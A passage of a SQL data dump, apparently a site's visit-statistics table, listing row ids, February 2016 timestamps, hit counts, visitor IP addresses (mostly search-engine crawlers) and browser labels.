127.15','other'),(2178,1455214316,1,1,0,0,'217.69.143.70','other'),(2179,1455214664,1,1,0,0,'217.69.136.209','other'),(2180,1455214686,3,3,0,0,'141.8.184.18','other'),(2181,1455214694,1,1,0,0,'141.8.132.34','other'),(2182,1455214698,2,2,0,0,'178.154.189.26','other'),(2183,1455214702,1,1,0,0,'130.193.51.17','other'),(2184,1455214707,3,3,0,0,'130.193.51.26','other'),(2185,1455214711,1,1,0,0,'5.255.253.103','other'),(2186,1455214715,1,1,0,0,'93.158.152.5','other'),(2187,1455214720,1,1,0,0,'93.158.152.14','other'),(2188,1455214723,1,1,0,0,'5.255.253.95','other'),(2189,1455214728,1,1,0,0,'5.255.253.99','other'),(2190,1455214732,2,2,0,0,'141.8.132.10','other'),(2191,1455214736,1,1,0,0,'141.8.132.45','other'),(2192,1455214744,1,1,0,0,'5.255.253.80','other'),(2193,1455214750,1,1,0,0,'141.8.183.1','other'),(2194,1455214753,1,1,0,0,'141.8.132.52','other'),(2195,1455214770,1,1,0,0,'93.158.152.53','other'),(2196,1455214779,1,1,0,0,'93.158.152.46','other'),(2197,1455214783,1,1,0,0,'178.154.189.17','other'),(2198,1455215362,1,1,0,0,'66.102.9.84','firefox'),(2199,1455215476,1,1,0,0,'62.210.215.100','chrome'),(2200,1455215500,1,1,0,0,'66.249.91.63','other'),(2201,1455215783,1,1,0,0,'217.69.143.51','other'),(2202,1455215859,1,0,1,0,'66.249.69.3',''),(2203,1455215978,2,0,2,0,'68.180.229.232',''),(2204,1455216616,1,1,0,0,'141.8.183.23','other'),(2205,1455216857,1,1,0,0,'176.105.210.106','chrome'),(2206,1455216861,1,1,0,0,'217.69.136.204','other'),(2207,1455217010,1,0,1,0,'68.180.229.232',''),(2208,1455217176,1,1,0,0,'141.8.184.18','other'),(2209,1455217180,1,1,0,0,'93.158.152.8','other'),(2210,1455217185,1,1,0,0,'141.8.132.45','other'),(2211,1455217189,1,1,0,0,'141.8.132.10','other'),(2212,1455217334,1,1,0,0,'195.138.84.6','msie'),(2213,1455217692,1,1,0,0,'89.178.81.216','msie'),(2214,1455217820,1,1,0,0,'94.179.117.153','chrome'),(2215,1455218000,1,0,1,0,'66.249.75.77',''),(2216,1455218098,1,1,0,0,'37.204.89.211','msie'),(2217,1455218182,1,1,0,0,'207.46.13.168','other'),(2218,1455218259,1,1,0,0,'40.77.167.69','other'),(2219,1455218467,1,1,0,0,'46.98.51.20','other'),(2220,1455218956,1,1,0,0,'5.255.253.23','other'),(2221,1455218960,2,2,0,0,'178.154.189.17','other'),(2222,1455218985,1,1,0,0,'37.9.122.201','other'),(2223,1455219431,1,1,0,0,'141.8.132.27','other'),(2224,1455219439,1,1,0,0,'93.158.152.46','other'),(2225,1455219450,1,1,0,0,'141.8.132.34','other'),(2226,1455219454,1,1,0,0,'130.193.51.29','other'),(2227,1455219458,1,1,0,0,'141.8.183.1','other'),(2228,1455219462,1,1,0,0,'130.193.51.17','other'),(2229,1455219494,1,1,0,0,'180.76.15.21','other'),(2230,1455219940,1,1,0,0,'217.69.143.63','other'),(2231,1455220013,1,1,0,0,'207.46.13.161','other'),(2232,1455220056,1,1,0,0,'46.119.114.88','chrome'),(2234,1455220110,1,0,1,0,'66.249.69.3',''),(2235,1455220958,1,1,0,0,'94.179.193.174','chrome'),(2236,1455221769,1,1,0,0,'89.178.82.105','msie'),(2237,1455221912,1,0,1,0,'66.249.69.124',''),(2238,1455222120,1,1,0,0,'213.191.23.174','msie'),(2239,1455222208,161,161,0,0,'80.91.162.99','other'),(2240,1455222283,1,1,0,0,'93.158.152.5','other'),(2241,1455222287,1,1,0,0,'93.158.152.46','other'),(2242,1455222292,1,1,0,0,'5.255.253.103','other'),(2243,1455222297,1,1,0,0,'141.8.132.45','other'),(2244,1455222397,1,1,0,0,'141.8.132.52','other'),(2245,1455222694,1,0,1,0,'68.180.229.232',''),(2246,1455222777,1,1,0,0,'8.29.198.25','other'),(2247,1455223425,300,300,0,0,'109.87.138.56','other'),(2248,1455223711,1,1,0,0,'130.193.51.17','other'),(2249,1455223715,1,1,0,0,'141.8.132.52','other'),(2250,1455223719,1,1,0,0,'130.193.51.26','other'),(2251,1455223841,1,1,0,0,'5.255.253.95','other'),(2252,1455224425,1,1,0,0,'180.76.15.24','other'),(2253,1455224628,1,1,0,0,'40.77.167.78','other'),(2254,1455224640,1,1,0,0,'213.174.7.16','other'),(2255,1455224962,2,0,2,0,'68.180.229.232',''),(2256,1455225173,1,1,0,0,'171.25.193.25','chrome'),(2257,1455225947,1,1,0,0,'93.158.152.46','other'),(2258,1455225951,2,2,0,0,'5.255.253.99','other'),(2259,1455225952,2,2,0,0,'141.8.183.1','other'),(2260,1455226234,2,0,2,0,'68.180.229.232',''),(2261,1455226253,1,1,0,0,'93.158.152.5','other'),(2262,1455226370,1,1,0,0,'66.249.91.63','other'),(2263,1455227352,1,0,1,0,'66.249.69.124',''),(2264,1455227745,1,1,0,0,'207.46.13.168','other'),(2265,1455227993,1,1,0,0,'40.77.167.78','other'),(2266,1455228371,1,1,0,0,'93.158.152.46','other'),(2267,1455228620,5,5,0,0,'80.91.162.99','other'),(2268,1455228857,2,2,0,0,'100.43.81.149','other'),(2269,1455228906,32,32,0,0,'144.76.30.236','other'),(2270,1455229488,1,1,0,0,'94.179.107.180','chrome'),(2271,1455229618,1,0,1,0,'68.180.229.232',''),(2272,1455230027,1,1,0,0,'217.69.143.55','other'),(2273,1455230182,1,1,0,0,'40.77.167.78','other'),(2274,1455230382,1,1,0,0,'130.193.50.7','other'),(2275,1455231121,1,1,0,0,'95.27.234.57','msie'),(2276,1455232373,3,0,3,0,'68.180.229.232',''),(2277,1455232742,1,1,0,0,'217.69.136.208','other'),(2278,1455232749,1,0,1,0,'66.249.69.124',''),(2279,1455233666,1,1,0,0,'8.29.198.25','other'),(2280,1455233850,1,0,1,0,'66.249.69.124',''),(2281,1455234145,1,0,1,0,'68.180.229.232',''),(2282,1455234302,1,0,1,0,'66.249.69.3',''),(2283,1455234503,2,0,2,0,'66.249.69.11',''),(2284,1455235316,1,1,0,0,'78.111.186.183','firefox'),(2285,1455235346,1,1,0,0,'40.77.167.69','other'),(2286,1455235462,1,1,0,0,'91.196.178.9','chrome'),(2287,1455235622,1,1,0,0,'217.69.143.61','other'),(2288,1455236015,1,1,0,0,'5.255.253.95','other'),(2289,1455236549,1,0,1,0,'66.249.69.11',''),(2290,1455237245,1,0,1,0,'66.249.69.3',''),(2291,1455237520,1,1,0,0,'66.249.91.4','other'),(2292,1455237641,1,0,1,0,'66.249.69.124',''),(2293,1455237923,2,0,2,0,'68.180.229.232',''),(2294,1455238466,4,4,0,0,'97.74.24.191','firefox'),(2295,1455238881,2,0,2,0,'68.180.229.232',''),(2296,1455240176,1,0,1,0,'68.180.229.232',''),(2297,1455241249,1,1,0,0,'178.154.189.203','other'),(2298,1455241253,1,1,0,0,'93.158.152.203','other'),(2299,1455241610,1,1,0,0,'207.46.13.161','other'),(2300,1455241698,1,1,0,0,'40.77.167.78','other'),(2301,1455242437,1,1,0,0,'40.77.167.69','other'),(2302,1455242738,1,0,1,0,'68.180.229.232',''),(2303,1455244474,1,1,0,0,'8.29.198.25','other'),(2304,1455245449,1,0,1,0,'66.249.69.11',''),(2305,1455246880,1,1,0,0,'178.154.189.201','other'),(2306,1455246949,1,1,0,0,'207.46.13.161','other'),(2307,1455247146,2,0,2,0,'68.180.229.232',''),(2308,1455247266,1,0,1,0,'66.249.69.3',''),(2309,1455247720,2,2,0,0,'141.8.184.18','other'),(2310,1455247724,2,2,0,0,'5.255.253.95','other'),(2311,1455247732,1,1,0,0,'141.8.132.10','other'),(2312,1455247801,1,1,0,0,'66.249.91.63','other'),(2313,1455247848,1,1,0,0,'178.94.180.45','chrome'),(2314,1455247905,2,0,2,0,'66.249.69.124',''),(2315,1455248266,1,1,0,0,'40.77.167.78','other'),(2316,1455248853,1,0,1,0,'66.249.69.11',''),(2317,1455248864,1,0,1,0,'66.249.75.85',''),(2318,1455248874,1,0,1,0,'66.249.75.77',''),(2319,1455249889,1,1,0,0,'217.69.143.57','other'),(2320,1455250104,1,1,0,0,'40.77.167.78','other'),(2321,1455250143,1,1,0,0,'180.76.15.150','other'),(2322,1455250284,1,1,0,0,'40.77.167.69','other'),(2323,1455250299,1,1,0,0,'217.69.143.58','other'),(2324,1455250481,1,1,0,0,'178.94.180.45','chrome'),(2325,1455250918,1,1,0,0,'62.210.215.100','chrome'),(2326,1455251096,1,0,1,0,'68.180.229.232',''),(2327,1455251425,1,1,0,0,'178.94.180.45','chrome'),(2328,1455251705,2,0,2,0,'66.249.69.124',''),(2329,1455252587,2,0,2,0,'66.249.75.85',''),(2330,1455252599,1,0,1,0,'66.249.75.77',''),(2331,1455252615,4,4,0,0,'188.166.24.57','other'),(2332,1455252622,1,1,0,0,'207.46.13.168','other'),(2333,1455253255,1,0,1,0,'68.180.229.232',''),(2334,1455253504,1,1,0,0,'79.135.193.189','other'),(2335,1455253654,1,1,0,0,'207.46.13.161','other'),(2336,1455253702,1,1,0,0,'141.8.184.18','other'),(2337,1455253707,4,4,0,0,'5.255.253.95','other'),(2338,1455253710,1,1,0,0,'141.8.132.10','other'),(2339,1455253718,4,4,0,0,'141.8.132.45','other'),(2340,1455254311,2,2,0,0,'177.75.16.71','other'),(2341,1455254437,1,1,0,0,'40.77.167.69','other'),(2342,1455254565,1,0,1,0,'68.180.229.232',''),(2343,1455254647,1,1,0,0,'207.46.13.161','other'),(2344,1455254874,1,1,0,0,'217.69.136.209','other'),(2345,1455255302,1,1,0,0,'8.29.198.26','other'),(2346,1455255379,1,1,0,0,'217.69.143.47','other'),(2347,1455255992,1,1,0,0,'157.55.39.192','other'),(2348,1455256020,3,3,0,0,'5.255.253.95','other'),(2349,1455256025,3,3,0,0,'178.154.189.17','other'),(2350,1455256037,2,2,0,0,'141.8.184.18','other'),(2351,1455256041,1,1,0,0,'141.8.132.45','other'),(2352,1455256049,2,2,0,0,'141.8.132.10','other'),(2353,1455257585,1,1,0,0,'62.210.215.100','chrome'),(2354,1455257658,1,1,0,0,'141.8.132.71','other'),(2355,1455257663,1,1,0,0,'93.158.152.46','other'),(2356,1455257670,1,1,0,0,'141.8.132.34','other'),(2357,1455257671,1,1,0,0,'130.193.51.29','other'),(2358,1455257675,2,2,0,0,'141.8.142.35','other'),(2359,1455257679,1,1,0,0,'178.154.189.17','other'),(2360,1455257687,1,1,0,0,'93.158.152.8','other'),(2361,1455257691,1,1,0,0,'141.8.132.10','other'),(2362,1455257698,1,1,0,0,'141.8.132.45','other'),(2363,1455257896,1,0,1,0,'66.249.69.3',''),(2364,1455257918,1,0,1,0,'66.249.69.124',''),(2365,1455258057,1,1,0,0,'157.55.39.192','other'),(2366,1455258060,1,0,1,0,'66.249.69.11',''),(2367,1455258165,1,1,0,0,'66.249.69.3','other'),(2368,1455258172,1,1,0,0,'40.77.167.78','other'),(2369,1455258201,1,1,0,0,'217.69.143.48','other'),(2370,1455258340,1,1,0,0,'66.249.91.4','other'),(2371,1455258851,1,1,0,0,'212.111.198.100','chrome'),(2372,1455259271,19,19,0,0,'157.55.39.192','other'),(2373,1455259301,22,22,0,0,'40.77.167.78','other'),(2374,1455259351,22,22,0,0,'157.55.39.110','other'),(2375,1455259377,1,1,0,0,'213.174.7.52','chrome'),(2376,1455259378,1,1,0,0,'217.69.136.207','other'),(2377,1455259482,1,0,1,0,'66.249.75.77',''),(2378,1455259587,1,1,0,0,'5.255.253.99','other'),(2379,1455259590,1,1,0,0,'141.8.132.45','other'),(2380,1455259644,1,1,0,0,'180.76.15.134','other'),(2381,1455259902,2,0,2,0,'68.180.229.232',''),(2382,1455260281,1,1,0,0,'213.174.7.20','chrome'),(2383,1455260421,55,55,0,0,'91.194.84.106','other'),(2384,1455260850,2,2,0,0,'94.179.34.4','chrome'),(2385,1455260895,1,1,0,0,'141.8.132.10','other'),(2386,1455260898,1,1,0,0,'141.8.184.18','other'),(2387,1455260901,2,2,0,0,'178.154.189.17','other'),(2388,1455260902,1,0,1,0,'68.180.229.232',''),(2389,1455260910,3,3,0,0,'5.255.253.95','other'),(2390,1455260914,1,1,0,0,'141.8.132.45','other'),(2391,1455260957,1,1,0,0,'213.174.7.52','chrome'),(2392,1455261575,1,1,0,0,'180.76.15.162','other'),(2393,1455261576,1,0,1,0,'66.249.69.11',''),(2394,1455262891,1,1,0,0,'213.174.7.19','firefox'),(2395,1455263694,1,1,0,0,'40.77.167.78','other'),(2396,1455263915,2,2,0,0,'141.8.132.45','other'),(2397,1455263919,2,2,0,0,'5.255.253.95','other'),(2398,1455263921,1,1,0,0,'178.154.189.17','other'),(2399,1455263924,1,1,0,0,'5.255.253.99','other'),(2400,1455263927,1,1,0,0,'141.8.132.10','other'),(2401,1455263944,1,1,0,0,'93.158.152.8','other'),(2402,1455264430,1,1,0,0,'178.154.189.204','other'),(2403,1455264777,1,1,0,0,'217.69.143.49','other'),(2404,1455265049,1,1,0,0,'217.69.143.69','other'),(2405,1455265050,1,1,0,0,'217.69.143.65','other'),(2406,1455265329,1,1,0,0,'78.111.185.249','firefox'),(2407,1455266006,3,3,0,0,'5.9.89.170','other'),(2408,1455266091,1,1,0,0,'213.174.7.17','firefox'),(2409,1455266146,1,0,1,0,'66.249.69.124',''),(2410,1455266156,1,1,0,0,'8.29.198.26','other'),(2411,1455266186,1,1,0,0,'130.193.50.7','other'),(2412,1455266189,3,3,0,0,'93.158.152.46','other'),(2413,1455266192,2,2,0,0,'178.154.189.26','other'),(2414,1455266197,1,1,0,0,'141.8.132.34','other'),(2415,1455266204,1,1,0,0,'5.255.253.103','other'),(2416,1455266207,1,1,0,0,'130.193.51.17','other'),(2417,1455266209,1,1,0,0,'141.8.142.35','other'),(2418,1455266533,3,1,2,0,'66.249.69.11',''),(2419,1455267170,5,0,5,0,'66.249.69.3',''),(2420,1455267192,4,0,4,0,'66.249.69.124',''),(2421,1455267381,1,1,0,0,'130.193.50.7','other'),(2422,1455267601,1,1,0,0,'213.174.7.19','firefox'),(2423,1455267604,1,1,0,0,'5.255.253.86','other'),(2424,1455267608,1,1,0,0,'5.255.253.82','other'),(2425,1455267609,1,1,0,0,'141.8.132.10','other'),(2426,1455267612,1,1,0,0,'93.158.152.46','other'),(2427,1455267614,1,1,0,0,'141.8.132.34','other'),(2428,1455267619,1,1,0,0,'5.255.253.80','other'),(2429,1455267621,1,1,0,0,'130.193.51.17','other'),(2430,1455267624,1,1,0,0,'5.255.253.124','other'),(2431,1455267715,1,1,0,0,'66.102.9.104','firefox'),(2432,1455267949,1,1,0,0,'157.55.39.192','other'),(2433,1455268085,1,1,0,0,'95.133.45.15','chrome'),(2434,1455268161,1,0,1,0,'66.249.69.11',''),(2435,1455268834,1,1,0,0,'66.249.69.124','other'),(2436,1455268876,1,1,0,0,'66.249.69.11','other'),(2437,1455268957,1,1,0,0,'66.249.75.93','other'),(2438,1455269198,1,1,0,0,'5.248.226.103','chrome'),(2439,1455269206,3,3,0,0,'141.8.132.10','other'),(2440,1455269208,1,1,0,0,'130.193.50.7','other'),(2441,1455269321,1,1,0,0,'66.249.91.8','other'),(2442,1455269341,1,1,0,0,'213.174.7.33','firefox'),(2443,1455269531,1,1,0,0,'66.249.75.77','other'),(2444,1455269582,2,2,0,0,'213.174.7.17','firefox'),(2445,1455269736,2,2,0,0,'66.249.69.3','other'),(2446,1455269741,5,5,0,0,'5.255.253.95','other'),(2447,1455269888,1,1,0,0,'141.8.132.45','other'),(2448,1455269889,2,2,0,0,'5.255.253.99','other'),(2449,1455269898,1,1,0,0,'178.154.189.17','other'),(2450,1455269982,1,1,0,0,'66.249.69.124','other'),(2451,1455270073,1,1,0,0,'213.174.7.39','firefox'),(2452,1455270187,1,1,0,0,'66.249.69.11','other'),(2453,1455270203,1,1,0,0,'5.248.226.103','chrome'),(2454,1455270870,8,8,0,0,'82.193.127.15','other'),(2455,1455270991,1,1,0,0,'213.174.7.44','chrome'),(2456,1455271027,1,1,0,0,'66.249.69.124','other'),(2457,1455271533,1,1,0,0,'5.255.253.95','other'),(2458,1455271727,1,1,0,0,'37.9.122.203','other'),(2459,1455271872,1,1,0,0,'91.196.178.16','chrome'),(2460,1455272052,1,1,0,0,'66.249.69.11','other'),(2461,1455272093,1,1,0,0,'66.249.69.124','other'),(2462,1455272564,1,1,0,0,'66.249.69.3','other'),(2463,1455273057,1,1,0,0,'40.77.167.69','other'),(2464,1455273220,1,1,0,0,'66.249.69.11','other'),(2465,1455273240,1,1,0,0,'66.249.69.124','other'),(2466,1455273896,2,2,0,0,'66.249.69.3','other'),(2467,1455274268,1,1,0,0,'40.77.167.69','other'),(2468,1455274376,1,1,0,0,'5.255.253.95','other'),(2469,1455274387,2,2,0,0,'66.249.69.124','other'),(2470,1455274425,1,1,0,0,'213.174.7.20','firefox'),(2471,1455275365,1,1,0,0,'66.249.75.77','other'),(2472,1455275432,1,1,0,0,'66.249.69.124','other'),(2473,1455275561,1,1,0,0,'93.180.199.254','firefox'),(2474,1455275600,1,1,0,0,'213.174.7.39','firefox'),(2475,1455275823,1,1,0,0,'40.77.167.78','other'),(2476,1455276273,2,2,0,0,'66.249.69.3','other'),(2477,1455276326,1,1,0,0,'217.69.136.208','other'),(2478,1455276391,1,0,1,0,'68.180.229.232',''),(2479,1455276639,1,1,0,0,'178.154.189.17','other'),(2480,1455276999,1,1,0,0,'8.29.198.26','other'),(2481,1455277266,2,2,0,0,'66.249.69.11','other'),(2482,1455277563,1,1,0,0,'66.249.69.3','other'),(2483,1455277796,1,1,0,0,'157.55.39.192','other'),(2484,1455277850,1,1,0,0,'66.249.69.124','other'),(2485,1455278202,1,1,0,0,'141.8.142.50','other'),(2486,1455278280,5,0,5,0,'68.180.229.232',''),(2487,1455278622,1,1,0,0,'213.174.7.17','firefox'),(2488,1455278714,1,1,0,0,'40.77.167.69','other'),(2489,1455278879,1,1,0,0,'94.179.87.132','firefox'),(2490,1455279085,1,1,0,0,'66.249.75.77','other'),(2491,1455279160,1,1,0,0,'130.193.51.48','other'),(2492,1455279183,2,2,0,0,'66.249.69.124','other'),(2493,1455279417,1,1,0,0,'213.174.7.39','firefox'),(2494,1455279700,1,1,0,0,'66.249.91.4','other'),(2495,1455279913,1,0,1,0,'66.249.69.3',''),(2496,1455279931,2,0,2,0,'68.180.229.232',''),(2497,1455280227,1,1,0,0,'91.210.145.247','chrome'),(2498,1455280329,1,1,0,0,'91.196.178.8','chrome'),(2499,1455280360,1,1,0,0,'213.200.47.138','firefox'),(2500,1455280385,1,1,0,0,'213.174.7.20','chrome'),(2501,1455280508,1,0,1,0,'66.249.69.11',''),(2502,1455280577,1,1,0,0,'5.255.253.95','other'),(2503,1455280578,1,1,0,0,'213.174.7.39','firefox'),(2504,1455280579,1,1,0,0,'178.154.189.17','other'),(2505,1455280581,1,1,0,0,'141.8.184.18','other'),(2506,1455280733,1,1,0,0,'5.248.226.103','chrome'),(2507,1455280930,1,1,0,0,'5.196.219.112','other'),(2508,1455281337,2,2,0,0,'177.75.16.71','other'),(2509,1455281452,1,1,0,0,'213.174.7.22','firefox'),(2510,1455281664,1,1,0,0,'5.255.253.95','other'),(2511,1455282173,2,2,0,0,'141.8.184.18','other'),(2512,1455282499,4,4,0,0,'178.154.189.17','other'),(2513,1455282522,1,1,0,0,'141.8.132.10','other'),(2514,1455282524,1,1,0,0,'141.8.132.45','other'),(2515,1455282553,1,1,0,0,'141.8.183.23','other'),(2516,1455282621,1,1,0,0,'5.255.253.99','other'),(2517,1455282647,1,1,0,0,'66.102.9.94','firefox'),(2518,1455282670,1,0,1,0,'66.249.69.124',''),(2519,1455282721,1,0,1,0,'66.249.69.3',''),(2520,1455283203,2,2,0,0,'141.8.184.18','other'),(2521,1455283297,1,1,0,0,'5.255.253.95','other'),(2522,1455283387,1,1,0,0,'46.201.240.112','firefox'),(2523,1455283473,1,1,0,0,'217.69.143.53','other'),(2524,1455283624,1,1,0,0,'31.43.61.28','chrome'),(2525,1455283781,1,1,0,0,'82.145.220.23','chrome'),(2526,1455283925,1,1,0,0,'141.8.132.45','other'),(2527,1455284366,1,1,0,0,'66.249.69.11','other'),(2528,1455284419,1,1,0,0,'141.8.184.18','other'),(2529,1455284422,1,1,0,0,'5.255.253.99','other'),(2530,1455284428,1,1,0,0,'66.249.75.85','other'),(2531,1455284611,1,1,0,0,'85.115.62.180','other'),(2532,1455284897,2,2,0,0,'82.193.127.15','other'),(2533,1455284932,1,1,0,0,'94.179.87.132','firefox'),(2534,1455284993,8,8,0,0,'5.255.253.95','other'),(2535,1455285168,1,1,0,0,'213.174.7.20','firefox'),(2536,1455285416,1,1,0,0,'94.23.230.134','msie'),(2537,1455285503,3,3,0,0,'178.154.189.17','other'),(2538,1455285506,1,1,0,0,'5.255.253.30','other'),(2539,1455285508,1,1,0,0,'141.8.142.12','other'),(2540,1455285510,2,2,0,0,'141.8.142.40','other'),(2541,1455285512,3,3,0,0,'5.255.253.94','other'),(2542,1455285515,2,2,0,0,'141.8.132.27','other'),(2543,1455285517,2,2,0,0,'5.255.253.23','other'),(2544,1455285520,2,2,0,0,'141.8.183.22','other'),(2545,1455285521,2,2,0,0,'141.8.142.50','other'),(2546,1455285526,2,2,0,0,'141.8.142.35','other'),(2547,1455285528,2,2,0,0,'141.8.132.52','other'),(2548,1455285532,2,2,0,0,'5.255.253.89','other'),(2549,1455285533,1,1,0,0,'213.174.7.39','firefox'),(2550,1455285535,2,2,0,0,'141.8.184.18','other'),(2551,1455285537,2,2,0,0,'93.158.152.8','other'),(2552,1455285539,1,1,0,0,'93.158.152.53','other'),(2553,1455285541,2,2,0,0,'5.255.253.99','other'),(2554,1455285544,2,2,0,0,'141.8.132.45','other'),(2555,1455285553,4,4,0,0,'141.8.132.10','other'),(2556,1455285566,1,1,0,0,'141.8.183.2','other'),(2557,1455285590,1,1,0,0,'130.193.50.7','other'),(2558,1455285592,1,1,0,0,'5.255.253.24','other'),(2559,1455285605,1,1,0,0,'130.193.51.38','other'),(2560,1455285608,1,1,0,0,'141.8.183.23','other'),(2561,1455285614,1,0,1,0,'66.249.69.124',''),(2562,1455285615,1,1,0,0,'141.8.132.71','other'),(2563,1455285978,1,1,0,0,'178.95.158.10','firefox'),(2564,1455286058,1,0,1,0,'68.180.229.232',''),(2565,1455286151,1,1,0,0,'217.69.143.58','other'),(2566,1455286169,1,1,0,0,'213.174.7.19','chrome'),(2567,1455286825,1,1,0,0,'5.255.253.95','other'),(2568,1455287205,1,1,0,0,'193.238.96.13','chrome'),(2569,1455287684,1,0,1,0,'66.249.69.124',''),(2570,1455287840,1,1,0,0,'8.29.198.26','other'),(2571,1455287842,5,5,0,0,'5.255.253.95','other'),(2572,1455287894,1,1,0,0,'66.249.69.3','other'),(2573,1455287941,1,1,0,0,'93.158.152.8','other'),(2574,1455287944,1,1,0,0,'93.158.152.46','other'),(2575,1455287947,1,1,0,0,'130.193.51.29','other'),(2576,1455287951,1,1,0,0,'130.193.51.17','other'),(2577,1455287953,1,1,0,0,'93.158.152.53','other'),(2578,1455287956,2,2,0,0,'141.8.142.12','other'),(2579,1455287960,1,1,0,0,'141.8.142.40','other'),(2580,1455287963,1,1,0,0,'5.255.253.94','other'),(2581,1455287966,1,1,0,0,'141.8.132.27','other'),(2582,1455287970,1,1,0,0,'5.255.253.23','other'),(2583,1455287973,1,1,0,0,'141.8.183.22','other'),(2584,1455287976,1,1,0,0,'130.193.51.38','other'),(2585,1455287980,5,5,0,0,'178.154.189.17','other'),(2586,1455287985,1,1,0,0,'141.8.183.1','other'),(2587,1455287993,1,1,0,0,'5.255.253.43','other'),(2588,1455287996,7,7,0,0,'141.8.184.18','other'),(2589,1455288004,2,2,0,0,'141.8.132.10','other'),(2590,1455288060,2,2,0,0,'141.8.132.45','other'),(2591,1455288112,1,1,0,0,'37.9.122.202','other'),(2592,1455288604,1,0,1,0,'66.249.69.124',''),(2593,1455289014,1,1,0,0,'178.92.250.175','chrome'),(2594,1455289143,1,1,0,0,'217.69.143.56','other'),(2595,1455289159,1,1,0,0,'66.249.69.124','other'),(2596,1455290059,1,0,1,0,'66.249.69.11',''),(2597,1455290121,37,37,0,0,'157.55.39.195','other'),(2598,1455290389,1,1,0,0,'66.249.69.11','other'),(2599,1455290490,1,1,0,0,'66.249.69.3','other'),(2600,1455290513,31,31,0,0,'157.55.39.112','other'),(2601,1455290559,1,1,0,0,'217.69.143.70','other'),(2602,1455290584,41,41,0,0,'157.55.39.110','other'),(2603,1455290599,1,0,1,0,'68.180.229.232',''),(2604,1455290888,1,1,0,0,'178.92.250.65','firefox'),(2605,1455290900,1,1,0,0,'66.249.91.8','other'),(2606,1455290932,1,1,0,0,'66.249.69.124','other'),(2607,1455291115,1,1,0,0,'62.210.215.100','chrome'),(2608,1455291354,1,1,0,0,'66.249.75.77','other'),(2609,1455291778,1,0,1,0,'66.249.69.3',''),(2610,1455292281,1,1,0,0,'141.8.184.18','other'),(2611,1455292931,1,1,0,0,'195.214.199.245','chrome'),(2612,1455293160,1,1,0,0,'37.53.89.22','chrome'),(2613,1455293173,1,1,0,0,'217.69.143.71','other'),(2614,1455293546,1,1,0,0,'207.46.13.177','other'),(2615,1455293605,2,2,0,0,'40.77.167.69','other'),(2616,1455293795,1,1,0,0,'54.226.133.245','other'),(2617,1455293884,2,1,1,0,'66.249.69.3',''),(2618,1455294246,1,1,0,0,'66.249.75.85','other'),(2619,1455294306,2,2,0,0,'66.249.69.11','other'),(2620,1455294522,3,3,0,0,'178.154.189.17','other'),(2621,1455294530,1,1,0,0,'5.255.253.23','other'),(2622,1455294538,1,1,0,0,'141.8.184.29','other'),(2623,1455294542,1,1,0,0,'93.158.152.8','other'),(2624,1455294546,1,1,0,0,'141.8.183.2','other'),(2625,1455294551,1,1,0,0,'141.8.183.27','other'),(2626,1455294554,1,1,0,0,'141.8.184.18','other'),(2627,1455294559,1,1,0,0,'5.255.253.95','other'),(2628,1455294863,232,232,0,0,'144.76.30.236','other'),(2629,1455295013,1,1,0,0,'178.92.250.65','firefox'),(2630,1455295150,3,3,0,0,'66.249.69.124','other'),(2631,1455295190,1,1,0,0,'180.76.15.15','other'),(2632,1455295605,1,1,0,0,'217.69.136.205','other'),(2633,1455295765,18,18,0,0,'144.76.30.236','other'),(2634,1455295878,1,1,0,0,'157.55.39.110','other'),(2635,1455295993,1,1,0,0,'141.8.132.27','other'),(2636,1455296057,3,0,3,0,'68.180.229.232',''),(2637,1455296174,1,1,0,0,'66.249.75.85','other'),(2638,1455296332,1,0,1,0,'66.249.69.11',''),(2639,1455296392,1,1,0,0,'5.255.253.89','other'),(2640,1455296396,1,1,0,0,'5.255.253.43','other'),(2641,1455296736,1,1,0,0,'66.249.69.3','other'),(2642,1455297490,1,1,0,0,'66.249.69.124','other'),(2643,1455297554,1,1,0,0,'178.92.250.65','firefox'),(2644,1455297927,1,1,0,0,'207.46.13.177','other'),(2645,1455297970,1,1,0,0,'157.55.39.112','other'),(2646,1455298034,1,0,1,0,'66.249.69.3',''),(2647,1455298045,1,1,0,0,'66.249.75.93','other'),(2648,1455298429,1,1,0,0,'40.77.167.69','other'),(2649,1455298461,1,1,0,0,'217.69.136.209','other'),(2650,1455298649,1,1,0,0,'8.29.198.25','other'),(2651,1455298844,1,1,0,0,'217.69.143.47','other'),(2652,1455298921,1,1,0,0,'157.55.39.110','other'),(2653,1455299137,1,1,0,0,'66.249.69.11','other'),(2654,1455300290,1,0,1,0,'66.249.69.3',''),(2655,1455300331,1,1,0,0,'146.120.29.163','chrome'),(2656,1455300591,1,1,0,0,'141.8.184.18','other'),(2657,1455300595,1,1,0,0,'178.154.189.17','other'),(2658,1455300763,1,1,0,0,'66.249.69.110','other'),(2659,1455300977,2,0,2,0,'68.180.229.232',''),(2660,1455301446,1,1,0,0,'40.77.167.69','other'),(2661,1455301474,1,1,0,0,'66.249.91.4','other'),(2662,1455301482,1,0,1,0,'66.249.69.124',''),(2663,1455301499,1,1,0,0,'157.55.39.110','other'),(2664,1455302352,1,1,0,0,'40.77.167.69','other'),(2665,1455302413,1,1,0,0,'178.92.250.65','firefox'),(2666,1455302520,3,3,0,0,'213.200.47.138','firefox'),(2667,1455302904,1,1,0,0,'217.69.143.59','other'),(2668,1455303110,1,1,0,0,'217.69.143.68','other'),(2669,1455303924,1,0,1,0,'68.180.229.232',''),(2670,1455304836,1,1,0,0,'207.46.13.177','other'),(2671,1455305041,1,1,0,0,'141.8.183.23','other'),(2672,1455305045,1,1,0,0,'141.8.184.19','other'),(2673,1455305509,1,1,0,0,'95.134.169.40','other'),(2674,1455305524,1,1,0,0,'178.154.189.204','other'),(2675,1455306152,1,1,0,0,'178.93.150.176','chrome'),(2676,1455306327,1,1,0,0,'217.69.143.49','other'),(2677,1455306388,1,1,0,0,'207.46.13.177','other'),(2678,1455307137,1,1,0,0,'178.154.189.17','other'),(2679,1455307141,1,1,0,0,'5.255.253.95','other'),(2680,1455307188,1,0,1,0,'68.180.229.232',''),(2681,1455307624,1,1,0,0,'92.113.174.248','chrome'),(2682,1455307754,2,2,0,0,'66.249.69.110','other'),(2683,1455308544,1,1,0,0,'157.55.39.112','other'),(2684,1455308855,1,0,1,0,'66.249.69.3',''),(2685,1455309333,1,1,0,0,'217.69.143.44','other'),(2686,1455309469,1,1,0,0,'8.29.198.26','other'),(2687,1455309509,1,1,0,0,'141.0.12.131','chrome'),(2688,1455309849,1,1,0,0,'5.255.253.95','other'),(2689,1455309993,1,1,0,0,'178.94.172.1','chrome'),(2690,1455310640,2,0,2,0,'66.249.69.3',''),(2691,1455311180,1,1,0,0,'207.46.13.177','other'),(2692,1455311727,2,2,0,0,'5.255.253.99','other'),(2693,1455311750,1,1